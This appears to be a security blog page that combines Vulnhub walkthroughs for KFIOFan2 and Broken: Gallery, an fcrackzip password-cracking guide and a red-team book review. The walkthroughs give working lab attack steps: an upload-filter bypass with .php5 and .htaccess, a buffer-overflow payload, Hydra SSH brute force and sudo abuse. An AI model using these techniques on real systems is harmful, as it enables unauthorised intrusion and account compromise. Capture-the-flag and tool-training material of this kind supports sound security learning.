CTF KFIOFan: 2 Vulnhub Walkthorugh

Today we are going to take on a new challenge KFIOFan2. The credit for making this VM machine goes to “Khaos Farbauti Ibn Oblivion” and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here

Security Level: Beginner

Penetrating Methodology:

Scanning

·        Netdiscover

·        Nmap

Enumeration

·        Enumerating ftp services

Exploitation

·        Uploading php shell to get ssh key

Privilege Escalation

·        Buffer Overflow to get sudo rights

Walkthrough:

Scanning:

First thing first, scan the vulnerable machine using nmap

nmap -p-  -A 192.168.1.33

Here we found that the only port open is port 26921

Let’s take a look at what the ftp service has to offer. The ssh banner gave us a message

“Salut Alice ! Suite a l'attaque sur notre precedent serveur, j'en prepare un nouveau qui sera bien plus securise ! C'est en travaux pour l'instant donc s'il te plait ne touche a rien pour l'instant... Bob”

Which translates to

“Hi Alice! Following the attack on our previous server, I prepare a new one that will be much more secure! It is under construction for now so please do not touch anything for now ... Bob”

We found anonymous login here.  After logging in, we found 4 images and a directory named `serrure`. We downloaded the images and checked the directory but found nothing in the directory

After getting not much information but only 4 images, we tried to decipher the hint behind this so we tried to find any kind of stegnographical content. So we tried to get some kind of information from the images by another method. We combined the images together and found that the catch was very simple. In the centre of the combined image we found a name of a file named as “cle.txt”.

We tried to find this file but did not find it anywhere. So we tried to do a little bit different step. We created a file with dummy content and put it into the target system through ftp

After putting the file in the serrure directory, we tried to scan the target system again. Looks like the cle.txt file worked as a key to unlock another port 26980 running http service

nmap –p- -A 192.168.1.33

Now that we have found one other port, we tried to enumerate the website  but the welcome message looked something like this

“Tout ce qui est, est père du mensonge et fils du néant”

Which translates into

“All that is, is father of lies and sons of nothingness”

While analysing the page source of the webpage, we found a comment something like this

“”

“”

Which translates into

“<! - Test presence cle.txt file: OK ->”

“<! - Test content cle.txt file: Error ->”

Indicating that the content of cle.txt file needs to be changed

Alongside this we tried to get more details about the target machine and found a directory named uploads, but with none content

Now to put the correct content in the cle.txt file, we tried to look for a meaning for the hint. After some research, we found an article written by the author of this lab. In this article we found that the hint is the description of the authors nickname i.e. Khaos Farbauti Ibn Oblivion.

We used this name as content of the cle.txt  and replace this file in the serrure directory through ftp

echo “Khaos Farbuti Ibn Oblivion” > cle.txt

ftp 192.168.1.33 26921

cd serure

delete cle.txt

put cle.txt

Now let’s check the webpage again. This time we found a file upload module in place, looks like the content of cle.txt file was being used to change the functioning of webpage. Now all we need to do is upload a shell, first we tried to upload a txt file and the was uploaded easily

Next we tried uploading a php shell but was blocked

To bypass the security we tried to upload a .php5 shell and succeded

Now to verify that our shell is uploaded, we tried to check the uploads directory and found that our file is there

Now we tried to execute the shell but failed, after some attempts we thought that there might be a .htaccess  which might be blocking us from executing a php application. So to override that we needed to over-write the previous one, we tried to create a blank .htaccess file and tried to upload that.

As we were able to upload the .htaccess file we tried to use the uploaded shell to run system commands and were able to do that. 

After some searching we found a ssh key

Now all we need to find is a ssh port to connect. We did nmap scan again and this time we found an ssh port on 26922

nmap -p- -A 192.168.1.33

Now we have a ssh port and a ssh key, lets try to combine them together and get a ssh connection. We saved the ssh key into a file named id_rsa, provided it 0600 permission and tried to use that key for connection. Once getting the connection we tried to find all the files with suid permissions and found that there is a file named test

chmod 0600 id_rsa

ssh bob@192.168.1.33 -p 26922 -i id_rsa

find / -perm –u=s –type f 2>/dev/null

When we tried to execute the file, it asked us for password and we don’t have any. We tried to check the strings in the file using the strings command and found some interesting things.

strings test

First we found that there is a system function in use, meaning there is a system command being executed.

Second we found a system command “touch /root/authorize_bob” indicating that this is the system command that we want to be executed

Third we found a string “aliceestnulle” right below the password prompt “Mot de passe”

We tried to run the file again with the password that we found and got a message

As we were not able to get anything even after entering correct password, we tried to get to get details from gdb

gdb test

set disassembly-flavor intel

disassemble main

start

We started the execution of the program using start command, when the program asked for password, we tried to discover buffer overflow vulnerability. We created a input string of length 50 using pattern_create.rb file from metasploit-framework. ­

cd /usr/share/metasploitable-framework/tools/exploit

./pattern_create.rb -l  50

After putting the input we found that after certain length our input is put into an executable stack

Before going on multiple types of buffer overflow exploitation, we went to our previous findings just to check whether we have some other hints to follow, fortunately we found that when we found the touch command in the strings command output, right above that there was a string having content as

lancement debug

when we translated this it resulted in

launch debug

when we tried to check the debug function, we found that there is a system function being executed inside the debug function.

disassemble debug

Next we are left with the attempt to execute the debug function, so with took the length of the string which resulted in buffer overflow, and replaced the characters which were stored in the executable stack with the address of the debug function.

python -c ‘print (“Aa0Aa1Aa2Aa3Aa4Aa5Aa6”+”\x20\x48\x55\x55\x55\x55”)’ | ./test

After running the same input for multiple attempts, we logged out of the ssh session and reconnected and tried sudo command and it worked.

ssh bob@192.168.1.33 -p 26922 -i id_rsa

sudo su

Let’s capture the flag and get finished with the CTF

cd /root

cat flag.txt

Comprehensive Guide on fcrackzip Tool

In this article, we are going to discuss fcrackzip which is a third-party tool for cracking zip files passwords. It is a best tool as it tries to search zipfile for encrypted files and tries to guess their password. Here, we have discussed each option available in fcrackzip so that we can use this tool to its best of potential.

There are many cases where an individual type an incorrect password. And unzip reacts quickly to it, it doesn’t even need to decrypt the whole file. While the encryption algorithm used by zip is relatively secure, fcrackzip made cracking easy by providing hooks for very fast password-cracking, directly in the zip file. Understanding these is crucial to zip password cracking.

Every password’s first twelve bytes are decrypted initially. Depending on the version of zip used to encrypt the file, the first ten or eleven bytes are random, followed by one or two bytes whose values are stored elsewhere in the zip file, i.e. are known beforehand. The password is considered wrong when the last bytes do not match. The only method to determine that whether the password I correct or not, we need to unzip the file and compare the uncompressed length and crc’s.

Earlier versions of pkzip stored two known bytes. Thus, the error rate was roughly 1/2¹⁶ =0.01%. pkware ‘improved’ the security of their format by only including one byte, so the possibility of false passwords is now raised to 0.4%. Unfortunately, there is no real way to distinguish one byte from two-byte formats, so we have to be conservative.

Introduction to fcrackzip

We frequently use zipped files due to its small size and encryption algorithm. These zipped files come with a facility of password protection which maintains the security of the files.

When u have lost the password, and the problem arises of how to crack it, fcrack comes to the rescue to save and provide you with the way out in order to protect your documents. Simple way to crack a protected zip file with the help of fcrackzip which is available under linux.

Fcrackzip is a free/fast zip password cracker, It was written by Marc lehmann <pcg@goof.com>. It was   not the fastest zip cracker available, but to provide a portable, free, but still fast zip password cracker.

Multiple feature of fcrackzip

As we are using Kali linux, fcrackzip tool is installed by default, we just need to open the terminal and just type “fcrackzip --help” and its help command will run and greet  you.

·         -b: for using brute force algorithms.

·         -D: for using dictionary.

·         -B: execute a small benchmark.

·         -c: use characters from charset.

·         -h: show the help message.

·         --version: show the version of this program.

·         -V: validate or check the algorithm.

·         -v: for verbose mode.

·         -p: for using a string as a password.

·         -l: for providing a specific length to password.

·         -u: for weed out wrong passwords.

·         -m: to specify the method number.

Creating a password protected zip file

Firstly, we have to create a password protected file in that process we need select that file which we want to secure with that format, after selecting that file we need to follow the command.

Syntax: zip --password

Cracking the password of zip file

fcrackzip is a very impactful tool and also quite easy to use for making a brute force attack on any zip file, for that we need to use different-different format for cracking the password of the zip file. In order to that we (-b) which allow us to brute force on that zip file, (-c) which define the charset for the dictionary to brute force.

fcrackzip -b -c 'a' file.zip

In the above result we are seeing all the possible outcomes of the attack if we want to wipe out the wrong passwords we can use (-u) which allow us to see only the correct outcome through the result.

fcrackzip -b -c 'a' -u file.zip

Verbose mode

In fcrackzip, verbose is a mode which can be intiated using (-v) parameter. Now verbose mode generates extended information. In our case verbose mode help us to get information about file in that password protected zip file, like size of that file, name of that file etc., And the current combination of dictionary which is applied on that zip file.

fcrackzip -b -v -c 'a' -u file.zip

Cracking numeric password with specific length

for that we have created a numeric password protected zip file with the same command which we use earlier to create a password protected zip file.

In this case we use to 2 different parameters like (-c ‘1’) we use that parameter earlier but that we use this for different purpose now we are using this for applying numeric charset. Second parameter is (-l)

this parameter is use to specify the length of the password (minimum length – maximum length).

zip --password 123 raj.zip user.txt

fcrackzip -b -v -c 'a' -l 1-3 -u raj.zip

Providing intial password

In this parameter we are providing a set initial password for brute force with the name string to supply passwords for dictionary searching, through this we can provide them the set of strings to add those keywords in their dictionary.

fcrackzip -b -v -c 'a' -p ignite -u file.zip

Dictionary Traversing

In this mode fcrackzip will read the passwords from a file that is given by us, that file must contain one password per line and should be alphabetically ordered, so that fcrackzip will work according to its default working.

fcrackzip -D -p rockyou.txt file.zip

Different method

In this parameter we are using different method than default for our cracking process the switch --help will print a list of available methods, and we can use --benchmark to see which method is best for our machine, use method number instead of the default cracking method.

fcrackzip -b -v -c 'a' -m 1 -u file.zip

Benchmark

This parameter is help us to findout which method of fcrackzip is more imapactfull in your machine by calculating a benchmarkscore.

Fcrackzip -B

Hands-on Red Team Tactics - A Red Team Edition book

Recently I had the pleasure and honor to be asked for adding my review for the Hands-on Red Team Tactics- A Red Team Edition book. As this book is published in September 2018 thence it covers all latest track of evasions and attacks.

I appreciate the great effort has been done by “Himanshu Sharma” who is an Indian Ethical Hacker and has already achieved fame for finding security loopholes and vulnerabilities in Apple, Google, Microsoft, Facebook, Adobe, Uber, AT&T, Avira, and many more with hall of fame listings. And, “Harpreet Singh” who has more than 5 years experience in the field of Ethical Hacking, Penetration Testing, and Red Teaming. Harpreet is an Offensive Security Certified Professional (OSCP) and Offensive Security Wireless Professional (OSWP).

Adding Especial Thanks to “Raj Chandel” and “Aarti Singh” for assisting me to comprehend the concept of red team operation in most effective way.

While reading this book I found it has covered some very advanced and useful tools for performing red team practice that I generally use while performing red team operation therefore I feel this book is virtuous resource for those who wishes to enhance their skills from traditional VAPT.

Book Overview

Red Teaming is used to enhance security by performing simulated attacks on the organization in order to detect network and system vulnerabilities. Hands-On Red Team Tactics starts with an overview of pentesting and Red Teaming, before giving an introduction of few of the latest pentesting tools. You will then move on to exploring Metasploit and getting to grips with Armitage. Once you have studied the basics, you will understand Cobalt Strike basic, usage and how to set up a team server of Cobalt Strike.

You will discover some common lesser known techniques for pivoting and how to pivot over SSH, before using Cobalt Strike to pivot. This comprehensive guide demonstrates the advanced methods of post-exploitation using Cobalt Strike and introduces you to Command-and-control servers (C2) and Redirectors. All this will help you achieve persistence using Beacons and Data Exfiltration, and will also give you the chance to run through the methodology to use Red Team activity tools like Empire during a Red Team activity on Active Directory and Domain Controller.

By the end of the book, you will have learned advanced penetration testing tools, techniques to get reverse shells over encrypted channels and processes for post- exploitation. In addition to this, you will explore frameworks such as Empire which include maintaining persistent access, staying untraceable, and getting reverse connections over different C2 covert channels.

 Key Features

·        Target a complex enterprise environment in a red team activity

·        Detect threats and respond to them with a real-world cyber-attack simulation

·        Explore advanced penetration testing tools and techniques

Who this book is for?

Hands-On Red Team Tactics is for you if you are an IT professional, pentester, security consultant, or ethical hacker interested in the IT security domain and wants to go beyond Penetration Testing. Prior knowledge of penetration testing is beneficial.

What you will learn

·        Get started with red team engagements using less common methods

·        Explore a variety of post-exploitation techniques

·        Get acquainted with all the tools and frameworks included in the Metasploit framework

·        Discover how you can gain stealth access to systems via red teaming

·        Understand the concept of redirectors to add further anonymity to your C2

·        Work through a range of uncommon data exfiltration techniques

What this book covers ?

Chapter 1: Red-Teaming and Pentesting, helps you understand about different standards of pentesting followed across the industry, and we went through the seven phases of the PTES standard in detail.

Chapter 2: Pentesting 2018, introduces you to MSF Payload Creator (MSFPC). We will also look at the use of resource files which were generated by MSFPC besides the payload file.

Chapter 3: Foreplay – Metasploit Basics, teaches you about team server and the Armitage client, including the setup and usage of Armitage.

Chapter 4: Getting Started with Cobalt Strike, starts by exploring the red-team exercise as well as the concept of the cyber kill chain, which can be used for an attack plan. The chapter then introduces you to Cobalt Strike, the tool that is used for red-team operations.

Chapter 5: ./ReverseShell, explores what a reverse connection and reverse shell connection is using various tools. Furthermore, we will try different payloads to get reverse shell connections using Metasploit.

Chapter 6: Pivoting, dives into port forwarding and its uses. We will also learn about pivoting and its uses, followed by methods of port forwarding via SSH.

Chapter 7: Age of Empire – The beginning, introduces you to Empire and its fundamentals.

We will also cover Empire's basic usage and the post exploitation basics for Windows, Linux and OSX.

Chapter 8: Age of Empire – Owning Domain Controllers, delves into some more advanced uses of the Empire tool to get access to the Domain Controller.

Chapter 9: Cobalt Strike – Red Team Operations, teaches you about the listener module of Cobalt Strike along with its type and usage.

Chapter 10: C2 – Master of Puppets, provides an introduction to command and control (C2) servers and discussed how they are used in a red team operation.

Chapter 11: Obfuscate C2s – Introducing Redirectors, introduces you to redirectors and the reason why obfuscating C2s are required. We have also covered how we can obfuscate C2s in a secure manner so that we can protect our C2s from getting detected by the Blue team.

Chapter 12: Achieving Persistence, dives into achieving persistence using Armitage's inbuilt exploit modules, then we will learn how to do the same via Empire on Windows, Linux, and macOS machines.

Chapter 13: Data Exfiltration, discusses about some basic ways of transferring data using simple tools like Netcat, OpenSSL and PowerShell. Next, we jumped into transforming the data using text-based steganography to avoid detection, as well as looking at the usage of the CloakifyFactory tool.

This book is available on Amazon you can buy this from given below link:

https://www.amazon.com/Hands-Red-Team-Tactics-operations-ebook/dp/B07GVPGFTL/ref=sr_1_1?keywords=Hands-on+Red+Team+Tactics&qid=1566357945&s=audible&sr=8-1

Broken: Gallery Vulnhub Walkthrough

Broken: Gallery Vulnhub Walkthrough

We have another CTF challenges for CTF players that named as “Broken” and it can be download from vulnhub from here. The credit goes “Avraham Cohen” for designing this VM machine for beginners. This is Linux based CTF challenge where you can use your basic pentest skill for Compromising this VM to escalate the root privilege shell.

Penetration Testing Methodologies

Network Scanning

·         Netdiscover

·         Nmap

Enumeration

Exploiting

·         Brute Force

·         Post enumeration

Privilgege escalation

·         Abusing sudo rights

Walkthrough

Network Scanning

Let’s begin with network scan using netdisover to identify the host machine IP.

netdiscover

And this gave 192.168.1.107 as Host IP, now we will move toward ports and service scan further.

For deep network scan we always prefer to use nmap aggressive scan and this time also we will go with the same approach, thus will run the below command to enumerate running services and open port.

nmap -A 192.168.1.107

From its scan result we found port 22 and 80 is open for SSH and HTTP service respectively.

Enumeration

For more detail we need to start enumeration against the host machine therefore we navigate to web browser for exploring HTTP service.

 We obtained some files as shown in the given below image. Thus, we downloaded and explored each file but didn’t found any remarkable clue for further move.

Considering above file name could be helpful in generating a wordlist for brute force attack, I saved above file names and all relevant hint in two text files and named them “user” & “pwd” as shown below.

Exploiting

Now it was time to use hydra for making brute force attack on port 22 for SSH login thus we run below command in our local machine.

hydra -L user -P pwd 192.168.1.107 ssh

Great!! It works and we have broken:broken as SSH login credential.

With the help of above credential, we logged in and access the low privilege through user broken and notice that he has sudo rights for timedatectl and reboot to be execute with root privilege.

Privilege Escalation

To escalate the root privilege, we went for post enumerating and looked for .bash_history file.

In this file we noticed some interesting action has been performed by author which was pointing towards a file name “password-policy.sh” that exist inside /etc/init.d moreover a command to set time-date using “timedatectl” command and much more.

Very fast we open the password-policy.sh that exist inside /etc/init.d and found the a command for change the root password into “TodayIsAgoodDay” when met to the specific condition that i.e time-date.

So we run timedatectl command along sudo permissions and to set date and time and then reboot the machine as followed in the below commands

sudo timedatectl set-time '2015-11-20 16:14:50'

sudo /sbin/reboot

Now we again connect to host machine via ssh as done previously and then try to access root shell by switching the user account. As we were hoping the password should changed into “TodayIsAgoodDay” therefore we use it as for login as root.

Yes, it works, and we have successfully obtain the root shell and with this the task finished here.